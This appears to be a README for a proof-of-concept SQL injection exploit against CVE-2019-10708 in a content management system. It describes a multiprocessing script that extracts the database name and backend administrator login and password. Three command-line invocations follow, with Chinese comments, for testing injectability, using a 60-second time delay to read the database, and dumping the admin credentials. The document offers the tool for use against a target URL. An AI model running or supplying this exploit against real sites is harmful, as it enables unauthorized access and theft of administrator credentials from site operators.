
CVE-2019-10708 SQL injection PoC
exploit.py is a PoC for the CVE-2019-10708 vulnerability, implementing multiprocessing for injection to obtain the database name and backend administrator credentials (recommended for versions before 20190401)
# 測試是否可注入
python3 exploit.py http:localhost/js/scms.php --test
# sleep時間為60秒與取得資料庫
python3 exploit.py http:localhost/js/scms.php -s 60 --db
# 取得A_login與A_pwd
python3 exploit.py http:localhost/js/scms.php --login --pwd